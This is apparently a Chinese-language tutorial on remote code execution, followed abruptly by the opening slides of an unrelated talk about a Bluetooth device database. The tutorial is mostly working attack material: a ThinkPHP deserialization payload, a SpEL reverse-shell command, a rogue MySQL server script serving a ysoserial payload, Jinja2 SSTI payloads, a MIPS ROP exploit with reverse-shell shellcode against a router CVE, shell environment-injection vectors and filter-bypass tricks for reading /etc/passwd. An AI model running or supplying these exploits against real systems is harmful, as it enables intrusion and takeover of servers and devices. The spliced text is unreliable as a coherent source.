'var_pathinfo' => 's',
// 兼容 PATH_INFO 获取
'pathinfo_fetch' => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO',
'REDIRECT_URL'],
// 默认全局过滤方法 用逗号分隔多个
'default_filter' => '',
// 域名根,如 thinkphp.cn
'url_domain_root' => '',
// HTTPS 代理标识
'https_agent_name' => '',
// IP 代理获取标识
'http_agent_ip' => 'HTTP_X_REAL_IP',
// URL 伪静态后缀
'url_html_suffix' => 'html',
];
function __construct(){
$this->filter = "system";
$this->config = ["var_ajax"=>''];
$this->hook = ["visible"=>[$this,"isAjax"]];
}
}
namespace think\process\pipes;
use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
private $files = [];
public function __construct()
{
$this->files=[new Pivot()];
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
/*input=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOn
tzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIj
thOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIA
KgBhcHBlbmQiO2E6MTp7czo1OiJldGhhbiI7YToyOntpOjA7czozOiJka
XIiO2k6MTtzOjQ6ImNhbGMiO319czoxNzoiAHRoaW5rXE1vZGVsAG
RhdGEiO2E6MTp7czo1OiJldGhhbiI7TzoxMzoidGhpbmtcUmVxdWVz
dCI6Mzp7czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyO
ntpOjA7cjo5O2k6MTtzOjY6ImlzQWpheCI7fX1zOjk6IgAqAGZpbHRlciI
7czo2OiJzeXN0ZW0iO3M6OToiACoAY29uZmlnIjthOjE6e3M6ODoid
mFyX2FqYXgiO3M6MDoiIjt9fX19fX0=&id=whoami*/
?>
然后 php 2.php 生成 payload,在 id 里加个 whoami
成功拿下 rce
因为这个反序列化网上教程都是静态硬审的,所以非常不好理解,为
了便于理解,我们可以使用 xdebug 配合 phpstorm 进行动态调试,
更好地理解参数传递的过程
Php.ini 文件:
然后开启监听,burp 打上 payload 开始跟
入口进来
然后 param 函数,获取到了一些方法之类的参数
跟到 input
getFilter
反序列化入口点
调用__destruct
removeFiles
调用了 toString
然后跟进 tojson
继续跟进 toArray
然后就是 getAttr
getData
getRelation
然后跳过几个无用步骤,进到了 call
isAjax
然后再跳到 param
然后再跳几下,就到了 appShutdown 结束
这就是一个大致的流程,理论还是按照静态审的来,也可以动态自己
跟着走一遍可以理解(这里用的都是 f8,如果要跟的更加深入一点可
以 f7 进入每个方法的模块一点点看,我这里跳步比较多,所以还是
推荐自己去跟一下深入理解)
Php 说了这么多,那么再来稍微说下 java,因为我 java 学的并不是很
多,所以这里只是简单写几个案例,先来说一下 java 和 php 不同的
地方,php 中的 exec,就相当于正常的 cmd 了,但是在 java 中却不
一样,如下,单纯一个 whoami 可以正常执行
但 是 当 我 们 用 管 道 符 拼 接 的 时 候 发 现 , 报 错 了 , 这 是 因 为
Runtime.getRuntime().exec 将里面的参数当成一个完整的字符串了,
而不是管道符分割的两个命令,那么也就不能像 php 一样进行拼接
rce 了,这也是体现 java 安全性高的一点(当然如果开发直接把参数
代入了也是可以的,但是我没找到这样的 java 案例,这里有个坑点,
记得加 exec.waitFor,不然执行不成功的,也可能单纯是我环境的问
题)
但是用 cmd /c 是可以的,不过如果开发写的是 ping 加参数依旧是
不能直接拼接的,必须 command 全部参数都可控才行
表达式注入
然后就是 java 的表达式注入,这里用最近的 Spring Cloud Function 的
spel 表达式注入做测试(因为好找靶场,本地环境一直搭不起来)(除
了 spel 还有 OGNL,MVEL,EL 等,这里只用 spel 举例做测试)
先看一个简单的 demo,这里我们发现 12 行的 expression 代入到了
13 行的 parseExpression 中,可以解析 java.lang.Runtime 类,那么我
们就可以直接执行命令
后面就是反弹 shell 了,网上文章较多,大家自行测试
T(java.lang.Runtime).getRuntime().exec("bash -c {echo,base64 加密的
shell}|{base64,-d}|{bash,-i}")
原理分析,参考(https://www.t00ls.cc/thread-65356-1-1.html)
这里获取 post,然后将参数转到 processRequest
往下跟进 processRequest
注意这里是 header,这也是为啥 payload 在 header 中传输
然后跟进 apply 进去
传进来的数据跟进 doApply,在进去 doApply 方法看
跟进 apply
发现参数到了 route,在跟进 route
判 断 请 求 头 有 没 有 spring 那 段 , 如 果 有 的 话 就 进 入 到
functionFromExpression 里代入,那我们进去这个函数看一下
跟开头一样,这里的 parseExpression 直接带入进来解析,所以也就
成功的 rce 了
JNDI 注入
这里的 jndiName 可控,我们就可以直接造成 Rce
“RMI(Remote Method Invocation),是一种跨 JVM 实现方法调用的
技术。
在 RMI 的通信方式中,由以下三个大部分组成:
Client
Registry
Server
其中 Client 是客户端,Server 是服务端,而 Registry 是注册中心。
客户端会 Registry 取得服务端注册的服务,从而调用服务端的远程方
法。
注册中心在 RMI 通信中起到了一个什么样的作用?我们可以把他理
解成一个字典,一个负责网络传输的模块。
服务端在注册中心注册服务时,需要提供一个 key 以及一个 value,
这个 value 是一个远程对象,Registry 会对这个远程对象进行封装,
使其转为一个远程代理对象。当客户端想要调用远程对象的方法时,
则需要先通过 Registry 获取到这个远程代理对象,使用远程代理对象
与服务端开放的端口进行通信,从而取得调用方法的结果。
”
Jndi 注入最知名的案例应该就是 log4j 了
原理分析
解开 jar 包
入口
主要是 127-132 这段
127 逻辑进去后,129 行判断字符串中是否包含 ${ 如果包含,就将
从这个字符开始一直到字符串结束替换为下面的值,然后就是 132 替
换值的地方
跟进 getStrSubstitutor()
JDBC 反序列化 RCE
Java 还有一种独有的 RCE 方法就是 JDBC 可控配合反序列化的 RCE
官网下载 8.0.12 版本
https://downloads.mysql.com/archives/c-j/
看着两个参数组成的 payload
官方介绍
queryInterceptors : 一 个 逗 号 分 割 的
Class
列 表 ( 实 现 了
com.mysql.cj.interceptors.QueryInterceptor 接口的类),在 Query”之
间”进行执行来影响结果。
(效果上来看是在 Query 执行前后各插入一
次操作);
autoDeserialize:自动检测与反序列化存在 BLOB 字段中的对象;
设置为 com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor 这
个类之后,每次执行查询语句,都会调用拦截器的 preProcess 和
postProcess 方法
看到
\mysql-connector-java-8.0.12\src\main\user-
impl\java\com\mysql\cj\jdbc\interceptors\ServerStatusDiffIntercepto
r.java
文件中的 preProcess 里的 populateMapWithSessionStatusValues,跟
进这个函数
跟 进 去 之 后 发 现 先 执 行 了 show session status , 然 后 传 到
resultSeToMap 中,跟进这个函数
我们可以看到在 resultSeToMap 中出现了 getObject
这里跟进的是
\mysql-connector-java-8.0.12\src\main\user-
impl\java\com\mysql\cj\jdbc\result\ResultSetImpl.java
可以看到 try 语句中存在 readObject
最后贴上 Tri0mphe7 师傅的脚本
# -*- coding:utf-8 -*-
#@Time : 2020/7/27 2:10
#@Author: Tri0mphe7
#@File : server.py
import socket
import binascii
import os
greeting_data="4a0000000a352e372e31390008000000463b4526233
42c2d00fff7080200ff811500000000000000000000032851553e5c235
02c51366a006d7973716c5f6e61746976655f70617373776f726400"
response_ok_data="0700000200000002000000"
def receive_data(conn):
data = conn.recv(1024)
print("[*] Receiveing the package : {}".format(data))
return str(data).lower()
def send_data(conn,data):
print("[*] Sending the package : {}".format(data))
conn.send(binascii.a2b_hex(data))
def get_payload_content():
//file 文件的内容使用 ysoserial 生成的 使用规则 java -jar
ysoserial [common7 那个] "calc" > a
file= r'a'
if os.path.isfile(file):
with open(file, 'rb') as f:
payload_content
=
str(binascii.b2a_hex(f.read()),encoding='utf-8')
print("open successs")
else:
print("open false")
#calc
payload_content='aced0005737200116a6176612e7574696c2e48617
368536574ba44859596b8b7340300007870770c000000023f4000000
0000001737200346f72672e6170616368652e636f6d6d6f6e732e636f
6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7
472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f
6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574
696c2f4d61703b7870740003666f6f7372002a6f72672e617061636865
2e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a79
4d61706ee594829e7910940300014c0007666163746f727974002c4c6
f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e73
2f5472616e73666f726d65723b78707372003a6f72672e61706163686
52e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f727
32e436861696e65645472616e73666f726d657230c797ec287a970402
00015b000d695472616e73666f726d65727374002d5b4c6f72672f617
0616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e
73666f726d65723b78707572002d5b4c6f72672e6170616368652e636
f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d657
23bbd562af1d83418990200007870000000057372003b6f72672e617
0616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e6
3746f72732e436f6e7374616e745472616e73666f726d657258769011
4102b1940200014c000969436f6e7374616e7471007e000378707672
00116a6176612e6c616e672e52756e74696d65000000000000000000
000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f
6c6c656374696f6e732e66756e63746f72732e496e766f6b657254726
16e73666f726d657287e8ff6b7b7cce380200035b0005694172677374
00135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d65746
86f644e616d657400124c6a6176612f6c616e672f537472696e673b5b
000b69506172616d54797065737400125b4c6a6176612f6c616e672f4
36c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563
743b90ce589f1073296c02000078700000000274000a67657452756e7
4696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d
7aecbcd5a990200007870000000007400096765744d6574686f64757
1007e001b00000002767200106a6176612e6c616e672e537472696e6
7a0f0a4387a3bb34202000078707671007e001b7371007e001375710
07e001800000002707571007e001800000000740006696e766f6b657
571007e001b00000002767200106a6176612e6c616e672e4f626a656
374000000000000000000000078707671007e00187371007e0013757
200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7
b4702000078700000000174000463616c63740004657865637571007
e001b0000000171007e00207371007e000f737200116a6176612e6c6
16e672e496e746567657212e2a0a4f781873802000149000576616c75
65787200106a6176612e6c616e672e4e756d62657286ac951d0b94e0
8b020000787000000001737200116a6176612e7574696c2e48617368
4d61700507dac1c31660d103000246000a6c6f6164466163746f72490
0097468726573686f6c6478703f400000000000007708000000100000
0000787878'
return payload_content
# 主要逻辑
def run():
while 1:
conn, addr = sk.accept()
print("Connection come from {}:{}".format(addr[0],addr[1]))
# 1.先发送第一个 问候报文
send_data(conn,greeting_data)
while True:
# 登录认证过程模拟 1.客户端发送 request login 报
文 2.服务端响应 response_ok
receive_data(conn)
send_data(conn,response_ok_data)
#其他过程
data=receive_data(conn)
#查询一些配置信息,其中会发送自己的 版本号
if "session.auto_increment_increment" in data:
_payload='01000001132e00000203646566000000186175746f5f696e
6372656d656e745f696e6372656d656e74000c3f001500000008a0000
000002a00000303646566000000146368617261637465725f7365745f
636c69656e74000c21000c000000fd00001f00002e000004036465660
00000186368617261637465725f7365745f636f6e6e656374696f6e000
c21000c000000fd00001f00002b000005036465660000001563686172
61637465725f7365745f726573756c7473000c21000c000000fd00001f
00002a00000603646566000000146368617261637465725f7365745f7
36572766572000c210012000000fd00001f0000260000070364656600
000010636f6c6c6174696f6e5f736572766572000c210033000000fd00
001f000022000008036465660000000c696e69745f636f6e6e6563740
00c210000000000fd00001f0000290000090364656600000013696e74
65726163746976655f74696d656f7574000c3f001500000008a000000
0001d00000a03646566000000076c6963656e7365000c21000900000
0fd00001f00002c00000b03646566000000166c6f7765725f636173655
f7461626c655f6e616d6573000c3f001500000008a000000000280000
0c03646566000000126d61785f616c6c6f7765645f7061636b6574000c
3f001500000008a0000000002700000d03646566000000116e65745f7
7726974655f74696d656f7574000c3f001500000008a0000000002600
000e036465660000001071756572795f63616368655f73697a65000c3
f001500000008a0000000002600000f03646566000000107175657279
5f63616368655f74797065000c210009000000fd00001f00001e000010
036465660000000873716c5f6d6f6465000c21009b010000fd00001f00
0026000011036465660000001073797374656d5f74696d655f7a6f6e6
5000c21001b000000fd00001f00001f00001203646566000000097469
6d655f7a6f6e65000c210012000000fd00001f00002b00001303646566
000000157472616e73616374696f6e5f69736f6c6174696f6e000c2100
2d000000fd00001f000022000014036465660000000c776169745f746
96d656f7574000c3f001500000008a000000000020100150131047574
663804757466380475746638066c6174696e31116c6174696e315f737
765646973685f6369000532383830300347504c01310734313934333
0340236300731303438353736034f4646894f4e4c595f46554c4c5f475
24f55505f42592c5354524943545f5452414e535f5441424c45532c4e4
f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c45525
24f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f41555
44f5f4352454154455f555345522c4e4f5f454e47494e455f5355425354
49545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f5
2455045415441424c452d5245414405323838303007000016fe00000
2000000'
send_data(conn,_payload)
data=receive_data(conn)
elif "show warnings" in data:
_payload
=
'01000001031b00000203646566000000054c6576656c000c21001500
0000fd01001f00001a0000030364656600000004436f6465000c3f0004
00000003a1000000001d00000403646566000000074d657373616765
000c210000060000fd01001f000059000005075761726e696e6704313
238374b27404071756572795f63616368655f73697a65272069732064
65707265636174656420616e642077696c6c2062652072656d6f7665
6420696e2061206675747572652072656c656173652e590000060757
61726e696e6704313238374b27404071756572795f63616368655f747
9706527206973206465707265636174656420616e642077696c6c206
2652072656d6f76656420696e2061206675747572652072656c65617
3652e07000007fe000002000000'
send_data(conn, _payload)
data = receive_data(conn)
if "set names" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "set character_set_results" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "show session status" in data:
mysql_data = '0100000102'
mysql_data
+=
'1a000002036465660001630163016301630c3f00ffff0000fc90000000
00'
mysql_data
+=
'1a000003036465660001630163016301630c3f00ffff0000fc90000000
00'
# 为什么我加了 EOF Packet 就无法正常运行呢??
//获取 payload
payload_content=get_payload_content()
//计算 payload 长度
payload_length
=
str(hex(len(payload_content)//2)).replace('0x', '').zfill(4)
payload_length_hex
=
payload_length[2:4]
+
payload_length[0:2]
//计算数据包长度
data_len
=
str(hex(len(payload_content)//2
+
4)).replace('0x', '').zfill(6)
data_len_hex = data_len[4:6] + data_len[2:4] +
data_len[0:2]
mysql_data += data_len_hex + '04' + 'fbfc'+
payload_length_hex
mysql_data += str(payload_content)
mysql_data += '07000005fe000022000100'
send_data(conn, mysql_data)
data = receive_data(conn)
if "show warnings" in data:
payload
=
'01000001031b00000203646566000000054c6576656c000c21001500
0000fd01001f00001a0000030364656600000004436f6465000c3f0004
00000003a1000000001d00000403646566000000074d657373616765
000c210000060000fd01001f00006d000005044e6f746504313130356
25175657279202753484f572053455353494f4e205354415455532720
72657772697474656e20746f202773656c6563742069642c6f626a206
6726f6d2063657368692e6f626a732720627920612071756572792072
65777269746520706c7567696e07000006fe000002000000'
send_data(conn, payload)
break
if __name__ == '__main__':
HOST ='0.0.0.0'
PORT = 3309
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#当 socket 关闭后,本地端用于该 socket 的端口号立刻就可以被
重用.为了实验的时候不用等待很长时间
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sk.bind((HOST, PORT))
sk.listen(1)
print("start
fake
mysql
server
listening
on
{}:{}".format(HOST,PORT))
run()
SSTI 注入
除了这些还有一种 rce 非常的少见,就是 ssti 注入到 rce
简单 demo
我们可以看到计算成功,那么就证明这个点是存在 ssti 注入的
用网上的脚本跑一下 payload
from flask import Flask
from jinja2 import Template
searchList = ['__init__', "__new__", '__del__', '__repr__', '__str__',
'__bytes__', '__format__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__',
'__ge__',
'__hash__',
'__bool__',
'__getattr__',
'__getattribute__',
'__setattr__', '__dir__', '__delattr__', '__get__', '__set__', '__delete__',
'__call__',
"__instancecheck__",
'__subclasscheck__',
'__len__',
'__length_hint__',
'__missing__','__getitem__',
'__setitem__',
'__iter__','__delitem__',
'__reversed__',
'__contains__',
'__add__',
'__sub__','__mul__']
neededFunction = ['eval', 'open', 'exec']
pay = int(input("Payload?[1|0]"))
for index, i in enumerate({}.__class__.__base__.__subclasses__()):
for attr in searchList:
if hasattr(i, attr):
if eval('str(i.'+attr+')[1:9]') == 'function':
for goal in neededFunction:
if
(eval('"'+goal+'"
in
i.'+attr+'.__globals__["__builtins__"].keys()')):
if pay != 1:
print(i.__name__,":", attr, goal)
else:
print("{%
for
c
in
[].__class__.__base__.__subclasses__()
%}{%
if
c.__name__=='"
+
i.__name__ + "' %}{{ c." + attr + ".__globals__['__builtins__']." + goal +
"(\"[evil]\") }}{% endif %}{% endfor %}")
我们从 output 里随便抽一个 payload
例如第一行这个
{%
for
c
in
[].__class__.__base__.__subclasses__()
%}{%
if
c.__name__=='_ModuleLock' %}{{ c.__init__.__globals__['__builtins__'].e
val("print('ZACTEST')") }}{% endif %}{% endfor %}
然后打开我们的 web 服务,就是最开始的 demo
打进去 payload,我们可以看到成功 print 输出 ZACTEST
使用 os 模块执行 whoami
http://127.0.0.1:5000/?name={%
for
c
in
[].__class__.__base__.__subclasses__()
%}{%
if
c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].
eval("__import__('os').popen('whoami').read()") }}{% endif %}{% endfor %}
缓存区溢出 RCE
因为我并不是玩 pwn 的,所以对缓冲区溢出 RCE 几乎完全不懂,以
下就直接把大佬文章搬过来(已经得到授权)原文链接出处:
https://ret2w1cky.com/2021/11/12/RV110W-%E6%BC%8F%E6%B4%9E%
E5%A4%8D%E7%8E%B0/
假设我们已经通过类似固件解包,串口通信等方法获取了路由器的固
件等我们可以尝试通过寻找已知的 CVE 来定位可能的 rce,这里是寻
找到了 CVE-2020-3331 这个漏洞。
由于并没有对于漏洞点的一个精确定位 我们现在要一点一点的摸索;
首先 在上面的Nmap 扫描中 我们知道网站是开放了443端口的 因
此 上内部服务器之后 netstat 确定文件是最好的方式了 但是 因为
某一些原因 其中的 netstst 命令可能因为版本过低没有办法使用一些
参数 所以 我决定开个 http 服务器 把高等级的 busybox 传上去
可以看到 443 端口绑定的正是 httpd 文件 现在我们已经可以确定漏
洞文件了 现在只需要查找漏洞的函数了
这时候 我们就可以使用diff查找也就是查找两个文件不同的地方 我
们使用 Bindiff 工具, 现在 我们解包新版本的 和旧版本进行比对:
这里 可以说越红就代表差异越大 但是 你越往下看就会发现唯一这
个 guest_logout_cgi 和 web 有点关系 右键这个函数 View flow graph
嗯 随 便 一 看 就可以 看 到 这 里有 个高 风 险 函 数 `sscanf` 地 址 在
`0x431ba8`
其中 sscanf 的条件"%[^;];%*[^=]=%[^\n]"里,% 表示选择,%* 表示过
滤,中括号括起来的是类似正则
%[^;]:分号前的所有字符都要
%*[^=]:分号后,等号前的字符都不要
%[^\n]:等号后,换行符前的所有字符都要
也就是说,如果输入字符串”aaa;bbb=ccc”,会将 aaa 和 ccc 写入对应
变量,并没有限制长度,会导致栈溢出
找到了这段代码 我们现在要对伪代码进行分析 看看需要达到那些
分支才能达到`sscanf 函数`
通过查阅函数 可以知道我们需要让...
⚫ cmac:mac 格式
⚫ cip: ip 格式
⚫ submit_button: 包含 status_guestnet.asp
现在知道了页面是`/guest_logout.cgi`了 需要达成这些条件 那么 我
们就可以开始试图溢出了 exp 如下 :
import requests
url = "https://192.168.1.1/guest_logout.cgi"
payload
=
{"cmac":"12:af:aa:bb:cc:dd","submit_button":"status_guestnet.asp"+'a'
*100,"cip":"192.168.1.100"}
其中 我们还需要确定是用 get 还是 post 进行攻击 具体还是自己试
一试吧 最后会发现只有 post 攻击下 web 后台会转圈圈 所以可以确
定是 post 攻击方法
gdb-server 我们内部使用
https://gitee.com/h4lo1/HatLab_Tools_Library/tree/master/%E9%9D%9
9%E6%80%81%E7%BC%96%E8%AF%91%E8%B0%83%E8%AF%95%E7%A8%
使用 wget 下载到 /tmp 目录 通过上一次的`netstat`扫描 确定进程
号 并且绑定进程号 格式如下
./gdb.server :<绑定端口> --attach <绑定进程>
在 exp 上 我利用 cyclic 脚本来确定溢出点
exp 如下:
import requests
import requests
payload
=
'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaa
apaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabe
aabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaa
btaabuaabvaabwaabxaabyaab'
#(cyclic 200)
url = "https://10.10.10.1/guest_logout.cgi"
payload
=
{"cmac":"12:af:aa:bb:cc:dd","submit_button":"status_guestnet.asp"+pa
yload,"cip":"192.168.1.100"}
requests.packages.urllib3.disable_warnings()
requests.post(url, data=payload, verify=False, timeout=1)
打开 gdb multiarch 这样设置
#(记得按 c)
发送 exp 后 成功 确定了溢出点为 aaaw 通过 cyclic -l 查询 发现
为 85
现在 我们就可以准备构造语句了
ROP Get shell
mips 架构硬件并不支持 nx,所以利用方式通常为劫持程序流执行
shellcode
由于 sscanf 栈溢出,所以不能有空字节,而程序本身的 gadget 都是
有空字节的。。。
这时候自然想到用 libc 的 gadget,但是,比较诡异的一点是,它的
libc 基址每次都不变
这里 我们可以通过`cat /proc/<pid>/maps`查看
所以 我们就要通过 ret2libc 的方式 getshell 我们选择/lib/libc.so.0
利用 mipsgadget 发现两条有用的 gadgets
| 0x000257A0 | addiu $a0,$sp,0x58+var_40 | jalr $s0 |
| 0x0003D050 | move $t9,$a0 | jalr $a0 |
这样会造成什么效果呢?程序返回时,程序执行流被控制为 0x257a0,
去执行第一条 gadget,a0 = sp + 0x18,jmp 到 s0 寄存器,s0 寄存
器存的是第二条 gadget,继而去执行第二条 gadget,将 a0 放到 t9,
然后 jmp 到 a0,a0 存的是 shellcode 的地址,于是程序就会执行
shellcode
Shellcode
我们 shellcode 用 msfvenom 不会生产空字节
那么小伙伴可能要问了 *那 s0 寄存器地址怎么算呢?*
其实 只要用我们第一次算溢出的图用 cyclic 算就行了 也就是`cyclic
-l aaan`
Exp:
import requests
from pwn import *
p = listen(8788)
context.arch = 'mips'
context.endian = 'little'
context.os = 'linux'
libc = 0x2af98000
jmp_a0 = libc + 0x0003D050 # move $t9,$a0 ; jalr $a0
jmp_s0 = libc + 0x000257A0 # addiu $a0,$sp,0x38+var_20 ; jalr $s0
(var_20) = -20
buf = b""
buf += b"\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd"
buf += b"\xff\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01"
buf += b"\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f\xfd\xff\x0f"
buf += b"\x34\x27\x78\xe0\x01\xe2\xff\xaf\xaf\x22\x54\x0e\x3c"
buf += b"\x22\x54\xce\x35\xe4\xff\xae\xaf\x01\x65\x0e\x3c\xc0"
buf += b"\xa8\xce\x35\xe6\xff\xae\xaf\xe2\xff\xa5\x27\xef\xff"
buf += b"\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24\x0c\x01\x01"
buf += b"\x01\xfd\xff\x11\x24\x27\x88\x20\x02\xff\xff\xa4\x8f"
buf += b"\x21\x28\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff"
buf += b"\xff\x10\x24\xff\xff\x31\x22\xfa\xff\x30\x16\xff\xff"
buf += b"\x06\x28\x62\x69\x0f\x3c\x2f\x2f\xef\x35\xec\xff\xaf"
buf += b"\xaf\x73\x68\x0e\x3c\x6e\x2f\xce\x35\xf0\xff\xae\xaf"
buf += b"\xf4\xff\xa0\xaf\xec\xff\xa4\x27\xf8\xff\xa4\xaf\xfc"
buf += b"\xff\xa0\xaf\xf8\xff\xa5\x27\xab\x0f\x02\x24\x0c\x01"
buf += b"\x01\x01"
payload1 = "status_guestnet.asp"
payload1 += 'a' * 49 + p32(jmp_a0) # control $s0
payload1 += (85 - 49 - 4) * 'a' + p32(jmp_s0) # control gadgets2 ,
retuen to jmp_s0
payload1 += 'a' * 18 + buf # control $sp + 18
url = "https://192.168.1.1/guest_logout.cgi"
payload2 = {
"cmac": "12:af:aa:bb:cc:dd",
"submit_button": payload1,
"cip": "192.168.1.100"
}
requests.packages.urllib3.disable_warnings() #Hide warnings
requests.post(url, data=payload2, verify=False, timeout=1)
p.wait_for_connection()
log.success("getshell")
p.interactive()
成功 getshell
php 环境变量注入
某次在 P 牛的知识星球划水,发现了一个很骚的思路如下
我们可以看到两个点,putenv,传入的参数 envs 和最后的不可控变
量 system
这篇文章已经说得很详细了
https://tttang.com/archive/1450/
所以这里只是简单总结,如果想深入研究可以看看这篇帖子
下载源码然后看到这个文件\glibc-2.31\libio\iopopen.c,我们可以在
89 行看到的执行 sh -c,加上 p 牛的那段代码,最终输出的是 sh -c
echo hello
Readfile 的目的是读取 SHELL 中的 profile 文件
然后我们可以看到这段代码的 257 行,name 被 expandstr 解析
文章里说,iflag 经过分析是表示是否传入-i 参数,然后我溯源的时候
发 现 应 该 是 在 \dash-0.5.10.2\src\options.h
文 件 和 \dash-
0.5.10.2\src\options.c 文件中定义的
所以后面传参过去-i -c 就可以了
ENV='$(id 1>&2)' dash -i -c 'echo hello'
最后经过大佬的分析,在文件 variables.c 这段代码中
Parse_and_execute 执行 temp_string
我们可以在 bash-4.4-beta2\bash-4.4-beta2\builtins\evalstring.c 文
件看到该函数
不过其实哪怕看其他几个传参点也能知道 parse_and_excute 执行的
就是 shell 命令
最后以 p 牛给的几个途径完结
BASH_ENV:可以在 bash -c 的时候注入任意命令
ENV:可以在 sh -i -c 的时候注入任意命令
PS1:可以在 sh 或 bash 交互式环境下执行任意命令
PROMPT_COMMAND:可以在 bash 交互式环境下执行任意命令
BASH_FUNC_xxx%%:可以在 bash -c 或 sh -c 的时候执行任意命令
env 'BASH_FUNC_echo()=() { id; }' bash -c "echo hello"
当然除了这种,还有个 LD_PRELOAD,我这里就不复现了,感兴趣的
可以看看
http://www.hackdig.com/01/hack-572721.htm
POC/EXP 编写
RCE 的原理大家基本都懂了,但比如挖到了 0day,基本都是几千个
站及以上了,如果刷分的话手测得累死,所以需要自己开发 poc 进行
批量探测
这里先拿一个简单的 get 传参的 rce 来写
用一个小 0day 来做示范,如下
利用 payload
/data/manage/cmd.php?cmd=whoami
可以看到成功回显
那么思路就很清晰了,rce 直接用输出的数据,然后判断返回包是否
存在,导入 request 包,然后传参,判断返回包是否存在我们想要的
Exp 编写如下:
我们可以看到<br><pre>后面使我们的命令回显,那么我们之前的
字符都不需要,所以 print 出下标和整个 html 代码
我们可以看到我们的命令回显在<这里开头后的第九个位置,于是取到下标 b,从下标 b
开始到最后的都是我们的命令回显,那么就可以轻而易举的写出来 exp
当然这只是 get 的方法,那么 post 的 poc/exp 该如何编写呢?两者
差不多,区别就在于该如何传参
这里拿出一个某网关的 rce 做案例,可以看到,判断 flag 是否等于 1,
如果等于 1 就直接拼接参数 sipdev,然后 exec 无过滤直接输出
然后漏洞复现,因为这时候我的 burp 突然坏了,所以用 google 的
hackbar 来利用,就是没 burp 直接看返回包方便
成功 RCE
简单 poc 编写
简单 exp 编写
如果批量的话只需要同目录建一个 url.txt,然后 with open 打开遍历
就行了,网上文章很多很基础,这里就不做演示了
Bypass 笔记
基本案例就这些了,最后在加上一些 RCEbypass 的方法(本人 java 并
不是很好,所以这里只有 php 和 shell 系统命令之类的),有些复现过
有些没复现,可自行测试,可能不是很全,也欢迎大佬联系我进行补
充
1 变量 bypass
a=c;b=a;c=t;
$a$b$c /etc/passwd
2 16 编码绕过
"\x73\x79\x73\x74\x65\x6d"("cat /etc/passwd");
3 oct 编码绕过
$(printf "\154\163")//ls 命令
4 拼接绕过
sy.(st).em(whoami);//
c''a''t /etc/passwd//单引
c""a""t /etc/passwd//双引
c``a``t /etc/passwd/反单引
c\a\t /etc/passwd//反斜线
$*和$@,$x(x 代表 1-9),${x}(x>=10) :比如 ca${21}t a.txt 表示 cat a.txt
在没有传入参数的情况下,这些特殊字符默认为空,如下:
wh$1oami
who$@ami
whoa$*mi
5 利用未赋值变量绕过
cat /etc$u/passwd
cat$u /etc/passwd
6 通配符绕过
cat /passwd:
??? /e??/?a????
cat /e*/pa*
7 base 编码绕过
echo 'Y2F0wqAK' | base64 -d '1.txt'
8 过滤分割符 | & ;
; //分号
| //只执行后面那条命令
|| //只执行前面那条命令
& //两条命令都会执行
&& //两条命令都会执行
%0a //换行符
%0d //回车符号
用?>代替;
在 php 中可以用?>来代替最后的一个;,因为 php 遇到定界符关闭
标签会自动在末尾加上一个分号
9 远程下载/复制绕过
Copy,wget,curl 等函数,不直接写入文件,而是远程下载来保存文
件
当然除了这些肯定还有很多绕过方法,不过本篇文章不着重于此处,
可自行搜索
文章中部分是互联网的案例与素材,上上下下看了快几百个网站进行
资料查找,问了很多大佬,全程自己打字写所以肯定会有错误,看到
有技术性错误私聊我进行修改 or 删除,因为参考站点太多了,这里
就不一一写引用了,如有侵权请私信我修改 or 删除
Author: Zac
公众号 ZAC 安全
微信号 zacaq999
知识星球 ZAC | pdf |
THE BLUETOOTH
DEVICE DATABASE
Ryan Holeman
twitter: @hackgnar
Sunday, July 7, 13
OVERVIEW
• Collect BT devices
Sunday, July 7, 13
WHY?
• Curiosity
• Awareness
• Provide open data sets
• Provide collection tools
Sunday, July 7, 13
WHAT?
• Data
• Device geolocation
• BT address
• BT device names
• BT meta data
Sunday, July 7, 13
HOW?
• Clients
• ios, osx, linux, etc
• Servers
• bluetoothdatabase.com
• DIY
Sunday, July 7, 13
WHO?
• Open Source
• bnap bnap
• hackfromacave
• Proprietary
• geolocation vendors
• others...
Sunday, July 7, 13
CURIOSITY
• Whats out there?
